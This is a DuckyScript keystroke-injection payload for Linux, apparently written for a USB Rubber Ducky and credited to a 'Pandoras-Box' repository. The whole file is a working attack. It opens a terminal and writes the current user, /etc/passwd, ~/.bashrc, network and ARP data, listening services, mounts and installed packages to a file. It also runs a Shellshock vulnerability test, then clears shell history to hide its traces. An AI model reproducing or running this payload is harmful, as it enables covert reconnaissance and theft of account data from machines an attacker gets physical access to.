REM Title    : Info Capturing Script for Linux
REM Author   : Paranoid Ninja
REM Email    : paranoidninja@protonmail.com
REM Version  : 2
REM https://github.com/paranoidninja/Pandoras-Box
CTRL ALT t
DELAY 1500
STRING clear
DELAY 50
STRING echo "Logged in user: " $USER > info_gathering.txt
STRING echo >> info_gathering.txt
STRING echo '---------------------------' >> info_gathering.txt
STRING echo -n "Distribution Kernel Version: " >> info_gathering.txt
STRING cat /etc/issue | cut -c1-13 >> info_gathering.txt
STRING echo '---------------------------' >> info_gathering.txt
STRING echo -n "Bashrc Data: " >> info_gathering.txt
STRING cat ~/.bashrc >> info_gathering.txt
STRING echo '---------------------------' >> info_gathering.txt
STRING echo -n "uname results: " >> info_gathering.txt
STRING uname -a >> info_gathering.txt
STRING echo '---------------------------' >> info_gathering.txt
STRING echo -n "/etc/passwd results: " >> info_gathering.txt
STRING cat /etc/passwd >> info_gathering.txt
STRING echo '---------------------------' >> info_gathering.txt
STRING echo "Shellshock Bug Vulnerability: " >> info_gathering.txt
STRING env x='() { :;}; echo vulnerable' bash -c "not vulnerable" >> info_gathering.txt
STRING echo '---------------------------' >> info_gathering.txt
STRING echo "Mounted filesystems: " >> info_gathering.txt
STRING mount -l >> info_gathering.txt
STRING echo '---------------------------' >> info_gathering.txt
STRING echo "Network Configuration: " >> info_gathering.txt
STRING ifconfig -a | grep 'Link\|inet' >> info_gathering.txt
STRING echo '---------------------------' >> info_gathering.txt
STRING echo "Print Hosts: " >> info_gathering.txt
STRING cat /etc/hosts >> info_gathering.txt
STRING echo '---------------------------' >> info_gathering.txt
STRING echo "Print ARP: " >> info_gathering.txt
STRING arp >> info_gathering.txt
STRING echo '---------------------------' >> info_gathering.txt
STRING echo "Print TCP/UDP Listening Services: " >> info_gathering.txt
STRING netstat -tunlpe >> info_gathering.txt
STRING echo '---------------------------' >> info_gathering.txt
STRING echo "Installed Packages: " >> info_gathering.txt
STRING dpkg -l >> info_gathering.txt
STRING history -c
STRING exit
